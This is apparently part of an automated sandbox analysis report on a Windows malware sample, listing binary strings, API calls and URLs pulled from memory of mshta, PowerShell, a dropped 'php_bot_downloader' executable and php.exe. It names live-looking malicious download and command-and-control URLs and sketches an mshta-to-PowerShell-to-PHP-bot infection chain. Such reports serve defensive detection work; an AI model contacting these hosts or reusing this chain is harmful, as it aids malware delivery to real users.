mshta.exe, 00000005.00000003.1842138558.000001EB0EFA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842172300.000001EB0EFAA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php.pdb source: php.exe, 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 00000018.00000000.2016553083.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000000.2188454449.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000002.2894997934.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php_pdo_mysql.pdb source: php_pdo_mysql.dll.21.dr
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php_mysqli.pdb source: php_mysqli.dll.21.dr
        Source: Binary string: sethc.pdb source: mshta.exe, 00000005.00000003.1677761143.000001EB131FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840765627.000001EB139C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842211450.000001EB13116000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1679419864.000001EB131FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843243271.000001EB13118000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842473193.000001EB138C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841348809.000001EB13071000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842138558.000001EB0EFA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842172300.000001EB0EFAA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php.pdb"""UGP source: php.exe, 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 00000018.00000000.2016553083.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000000.2188454449.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000002.2894997934.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
        Source: Binary string: 1D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php8ts.pdb source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmp, php.exe, 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp, php.exe, 0000001C.00000002.2896990047.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmp, php.exe, 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp, php.exe, 0000001C.00000002.2896990047.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php_sysvshm.pdb source: php_sysvshm.dll.21.dr
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php_zend_test.pdb source: php_zend_test.dll.21.dr
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E42110 FindFirstFileExW,12_2_00007FF658E42110
        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E22270 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,12_2_00007FF658E22270
        Source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.php.net/report.php
        Source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.php.net/report.phpPlease
        Source: svchost.exe, 00000006.00000002.2897591888.000001B97E600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E4ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D777000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://myfilebuilders.com
        Source: powershell.exe, 00000007.00000002.1814428015.000001F41BB25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://php.net/xpath
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://php.net/xpathfunctionStringInvalid
        Source: php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://relaxng.org/ns/structure/1.0
        Source: php.exe, 0000001C.00000002.2892874564.0000014E5D471000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp
        Source: php.exe, 0000001C.00000002.2892874564.0000014E5D400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp/accept.php?ref=2
        Source: php.exe, 00000018.00000002.2893070291.000001E12DC00000.00000004.00001000.00020000.00000000.sdmp, php.exe, 0000001C.00000002.2892874564.0000014E5D400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp/apit.php
        Source: php.exe, 00000018.00000002.2893070291.000001E12DC57000.00000004.00001000.00020000.00000000.sdmp, php.exe, 0000001C.00000002.2892874564.0000014E5D456000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z3
        Source: php.exe, 0000001C.00000002.2892874564.0000014E5D456000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z30bE
        Source: php.exe, 00000018.00000002.2893070291.000001E12DC57000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z30r
        Source: php.exe, 00000018.00000002.2893070291.000001E12DC00000.00000004.00001000.00020000.00000000.sdmp, php.exe, 0000001C.00000002.2892874564.0000014E5D400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp/apit.phpxBdmFzdA==
        Source: php.exe, 0000001C.00000002.2892874564.0000014E5D471000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp/down/
        Source: php_bot_downloader_v2-AVERAGE-BOI-CLN.exe, 0000000C.00000002.2016578426.00000248770AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp/down/php-8.2.11-Win32-vs16-x64.zip
        Source: powershell.exe, 00000004.00000002.1654335033.000002A9CD591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd-//OASIS//DTD
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.php.net/
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.zend.com/
        Source: powershell.exe, 00000004.00000002.1654335033.000002A9CD5BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1654335033.000002A9CD5A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000007.00000002.1814428015.000001F41BB25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000007.00000002.1814428015.000001F41BB25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000007.00000002.1814428015.000001F41BB25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E562000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E562000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E562000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://github.com/php/php-src/issues
        Source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmp, php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://github.com/php/php-src/issues/(
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://github.com/php/php-src/issuesbefore
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40C769000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: mshta.exe, 00000005.00000003.1840043057.000001E30CCDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1888680116.000001E30CCE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885470413.000001E30CCDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.c
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.co
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D71C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com
        Source: mshta.exe, 00000005.00000002.1888633604.000001E30CCBF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840043057.000001E30CCBC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/P
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Pr
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Pro
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Prof
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Profe
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Profes
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Profess
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professi
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professio
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Profession
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professiona
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_S
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_So
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Soc
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Soci
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Socia
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social_
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social_M
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social_Me
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social_Med
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social_Medi
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social_Media
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social_Media_
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social_Media_R
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social_Media_Re
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social_Media_Rep
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social_Media_Repo
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social_Media_Repor
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social_Media_Report
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social_Media_Report.
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social_Media_Report.p
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social_Media_Report.pd
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/Professional_Social_Media_Report.pdf
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/p
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/ph
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_b
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bo
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_d
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_do
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_dow
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_down
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downl
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downlo
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloa
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_download
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloade
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-A
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AV
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVE
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVER
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVERA
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVERAG
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-B
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BO
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-
